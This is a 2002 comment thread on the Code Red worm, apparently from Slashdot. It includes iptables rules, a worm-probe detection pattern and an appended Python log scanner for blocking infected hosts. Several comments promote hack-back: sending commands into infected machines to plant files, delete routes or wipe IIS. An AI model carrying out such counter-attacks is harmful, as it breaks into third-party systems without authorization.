212.175.39.77 - - [19/Jul/2002:08:01:49 -0500] "GET
Morons.
...would seem to be the norm down there. I remember a couple years back, I was tracking down a luser on IRC who was bouncing off open proxies all over the world. One of them was that machine, IIRC. I sent e-mail (futile, I know) to various SAs telling them what the problem was. The only reply I got back, besides the automated responses, was from someone at that domain. He proceeded to bitch me out, accusing me of spreading FUD -- because of something HIS machine allowed. But he did claim to have plugged the hole afterwards. :P
on.
I think calling it "cherry-flavored" is too generous. "Red-flavored" is much more to the point.
Such a worm is already out. Or don't you keep up with network security?
The problem, of course, is that it isn't making much headway right now.
Believe it or not, out of all the people in the world running MS Outlook, fewer than 1% have ever pulled down security patches, see The Great MS Patch Nobody Uses.
Additionally, the Win2K/NT server guys are afraid to install security patches since they are never really sure how much of their server is going to break. Often times, Admins will patch the servers which touch the Internet but not the Internal servers for fear of breaking them. With Code Red, this was quite humorous because the outer servers were patched as soon as the Code Red patch was available, thinking this action would defend the realm against Code Red, but they forgot about the laptop users which brought Code Red in the back door via the local LAN.
But not to worry folks, once we get Palladium hardware in all our servers, this will not happen again right? In fact we won't even have to patch anymore, since everything will be secure and, only secure applications will be allowed to run.
Oh, wait, wouldn't IIS pass the palladium trusted application test?
Why yes it would... and Code Red would join the list of "Trusted Secure Applications"!
Sorry, I have to smack Palladium every time I get a chance.
It'd be nice if you read the title of your parent post before commenting. Here's a hint: No mac web os9 or older servers EVER exploited and another hint, this from your own post: # CGI-McPanic: script to crash MacOS X hmm.
...and it was quite a bit of fun riding skateboards around the corporate HQ at 2:30am in the morning...
As opposed to 2:30am in the afternoon?
Hey kids, there's only 5 days left 'til Yak Shaving Day!
Smallpox killed 300 million people in the 20th century, but a coordinated effort led by the WHO effectively eradicated it.
Who will lead the effort to eradicate CODE RED?
Since it allows random code to be run on infected servers, it is technically trivial to stop it.
Who will lead the counterattack?
Just wipe out IIS and reboot should do it.
RL
That is all I hear.. How about everyone stfu? If u hate Microsoft so much don't freakin use it? Go create your own product and stop ur whining!!
I know this. But a lot of government "security" is handled through microsoft products.
And if we ever did have a mark of the beast... er, Homeland Security ID, you can bet MS products would be running a lot of the system.
I was just trying to make a point in a somewhat quippy manner.
In Capitalist America, bank robs you!
From my memory I remember this is the straw that broke the camel's back for many of the people and companies that I knew who had been running IIS in some form or another. We had always been a Unix shop -- but many of the 3rd party "server" products had been written using ISAPI -- and required IIS and/or Windows to function... The companies that produced these products were flying high and raising the Microsoft sword of ignorance. This virus sent them all back into their holes. Some of them went back to the drawing board to port their products to a real OS and Web Server... The others are dead or close to death.
(+1 Funny) only if I laugh out loud.
Only thing I wish would have been done with this article, is that there should have been a link to removal tools for NT/2k. Remember, most Microsoft server "admins" (I use that term loosely) don't know what they're dealing with. Also, I know that the MS patch to fix that problem didn't work. For about 8 months I installed the patch to remove/repair my ONLY NT server about twice a week. It would stop the process and remove it, but the virus would just come back. The logs on my linux servers are what I went by to tell when my NT box had it....again. Anti-virus software doesn't even catch it half the time.
All I'm really saying is there should have been some information about removing it and so forth in the article. If we're gonna gripe about people not maintaining their servers, it behooves us to help them figure out how to do so.
In other news, an Anonymous Coward reports "There have been no reported incidents of any Commodore 64 webservers ever having been compromised! Oh, and my Honda Accord hasn't been compromised either..."
And if we ever did have a mark of the beast... er, Homeland Security ID, you can bet MS products would be running a lot of the system.
It might not be Microsoft. It might be Oracle. Why doesn't that make me feel any better?
Given one hour to live, the student replied: "I'd spend it with professor FP who can make an hour seem like a lifetime."
Folks, this is a PERFECT example of unintended consequences.
Any more questions on why people say computer law is jacked up?
OMG! Now the CATS are learning to program! How am I ever going to compete with programmers that get paid in Meow mix?!
This isn't so much about the anniversary of an aggressive virus so much as it is a reminder that people remain impressionable, gullible and downright clueless about the technology they use on a daily basis.
The same people with computers that end up ravaged by silly viruses attached to e-mail messages with subjects resembling "Virus Removal Tool" are the same people that wonder why they can't address e-mail to "www.yahoo.com" and so ask me to explain the difference between a web and e-mail address to them. Oh yeah, did I mention I do tech support for an ISP?
Worse yet, it's remarkable how people end up being repeatedly suckered by half-baked, ill-worded schemes to get you to open their 'refund.txt.bat' files.
The real weakest link here are the people -- after all, it's people that are responsible for creating and propagating viruses, but a close second for that ultimate prize goes to the method to all this madness: Microsoft Windows and its rotten offspring, Outlook Express. With ease of use comes ease of being deceived, which is all attributed to the same people who believe computers are toys -- the ignorant ones. That isn't to say everybody that uses Windows and Outlook Express are ignorant; I use Windows on a daily basis, never Outlook Express though. I set that aside in favour of no-frills e-mail through a shell account. There is an overrepresentation of stupid folks using Windows.
So with that reasoning, I suppose it would be more appropriate to wish the stupid folks a happy birthday.
- IP
here,
here,
and here.
I have since then been saving each nimda hit in a separate log and recently compiled a list of *ALL* unique nimda queries made to my web server which I use with home-grown cgi/shell scripts to make a series of requests back to the attackers' IP addresses as they hit me, which attempt to place warning text files in various places on their system and pop alert messages.
So I also recently posted a follow-up article on nimda which points you to all the queries I have catalogued so far.
Note: if you *really* want some of the shell scripts I use to attempt to warn the attackers just request so in comments to my journal, tho they really are nasty hacks. I just may write a java app triggered by a servlet or cgi one of these days.
Extraordinary Vacations. Exceptional Prices
iptables -t filter -A INPUT -i ${INET_IFACE} -p tcp --dport http -j WEBVIRUS
The default entry in WEBVIRUS chain would be to jump to the INETIN chain (or ACCEPT if that is what you want) if no matches were found:
iptables -t filter -A WEBVIRUS -j INETIN
Then, if there was some way to have Apache call 'iptables' each time it detected a "virus" hit (this is the part I haven't figured out yet...)
iptables -t filter -I WEBVIRUS -i ${INET_IFACE} -s ${host} -j LOGNDROP
which would insert the offending IP as the first entry in the WEBVIRUS chain. (LOGNDROP is just a rate-limited logging chain). Now the infected machine is effectively black-holed, preventing any further requests from even reaching Apache or the log files.
The tricky part is getting something like the following to work in Apache so it can call 'iptables' to add the offending IP:
RewriteRule ^(/(scripts|msadc|MSADC|./winnt)|.*(default\.ida|[ NX]{30}|c\+dir)) /cgi-bin/webvirus.pl [L,T=application/x-httpd-cgi]
Anybody have any ideas or seen any solutions that have integrated web-virus detection with iptables filtering?
This script will run "route delete 0.0.0.0" when someone infected with Code Red tries to infect your machine
click for scripty
I have been using this for six months with much success.
http://www.caida.org/analysis/security/code-red/coderedv2_analysis.xml#animations
and the mov version.
http://www.caida.org/analysis/security/code-red/newframes-small-log.mov
Why should Slashdot publicly celebrate the "accomplishment" of a few childish crackers?
There are plenty of hard working people out there.
Please stop giving undue credit to useless idiots who waste our oxygen supplies.
The biggest reason (IMHO) why Code Red spread so rampantly was not because:
- Microsoft writes lousy code (they're not great, but I don't believe they suck more than other httpd authors)
- Windows security is dreadful (Win95/98 is fairly bad, but I don't think NT is *that* horrific)
- The large installed base (Apache has kind of a big base)
- Microsoft has bad karma ;-)
I believe the real reason is the *homogeneity* of IIS and the Win32 platform. Virus and worm authors have a predictable environment for which to code. Biologists would refer to this as a monoculture. Monocultures are notoriously prone to being taken down -- witness the Irish potato famine.
Apache runs on far too many disparate platforms for a single exploit to "catch fire".
That's why I like an internet with many different OSes, machine architectures, http servers, etc. A diverse ecosystem is good for all!
Apache
...that I share a birthday with Code Red? :-)
Don't these virus authors do it for the fame and attention? Why feed an ego with an "anniversary story"?
Why make it difficult? Make a script in your favourite language; shell, perl, whatever, and name it 'default.ida' or 'root.exe' and plant it properly. The script, when called by Apache as a CGI, will have the IP address as an env variable. Use that to update your filter of choice appropriately.
Vintage computer games and RPG books available. Email me if you're interested.
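One way to connect the detection to the WEBVIRUS chain discussed in this thread, as an added example that is not code from any poster: it scans Apache access-log lines rather than running as a CGI, and builds the insert rule for each new offending address. The signature regex, the function names, the `eth0` interface and the sample log lines are assumptions made for illustration.

```python
import ipaddress
import re

# Apache common/combined log: client field first, request line in the first quoted field.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD|POST) (\S+)')
# Probe signatures named in the thread: default.ida with N/X filler, root.exe, cmd.exe, c+dir.
SIG_RE = re.compile(r'default\.ida\?[NX]{30}|/root\.exe|/cmd\.exe|c\+dir', re.I)


def offender(line):
    """Return the client address if the log line is a worm probe, else None."""
    m = LOG_RE.match(line)
    if not m or not SIG_RE.search(m.group(2)):
        return None
    try:
        # Parse before use: with HostnameLookups on, the field may be a name, not an address.
        return str(ipaddress.IPv4Address(m.group(1)))
    except ipaddress.AddressValueError:
        return None


def block_rules(lines, iface, allow=()):
    """Build one iptables argv per new offending address, skipping allowlisted networks."""
    nets = [ipaddress.ip_network(n) for n in allow]
    seen, rules = set(), []
    for line in lines:
        ip = offender(line)
        if ip is None or ip in seen:
            continue
        if any(ipaddress.ip_address(ip) in n for n in nets):
            continue
        seen.add(ip)
        # argv list, never a shell string: nothing taken from the log is shell-parsed.
        rules.append(["iptables", "-t", "filter", "-I", "WEBVIRUS",
                      "-i", iface, "-s", ip, "-j", "LOGNDROP"])
    return rules


# Constructed sample log lines (documentation-range addresses, shortened filler).
SAMPLE = [
    '203.0.113.9 - - [19/Jul/2002:08:01:49 -0500] "GET /default.ida?' + "N" * 40 + '%u9090=a HTTP/1.0" 400 329 "-" "-"',
    '203.0.113.9 - - [19/Jul/2002:08:02:10 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290 "-" "-"',
    '198.51.100.7 - - [19/Jul/2002:08:03:00 -0500] "GET /index.html HTTP/1.0" 200 1024 "-" "-"',
    '192.0.2.5 - - [19/Jul/2002:08:04:00 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"',
    'host.example.net - - [19/Jul/2002:08:05:00 -0500] "GET /default.ida?' + "X" * 40 + ' HTTP/1.0" 404 290 "-" "-"',
]

if __name__ == "__main__":
    for argv in block_rules(SAMPLE, "eth0", allow=["192.0.2.0/24"]):
        print(" ".join(argv))
```

The web server account normally lacks the privilege to change netfilter rules, so a scanner like this runs as a separate privileged process that passes each argv list to `subprocess.run`. Keeping your own networks and monitoring hosts in `allow` prevents a stray or forged log entry from locking them out.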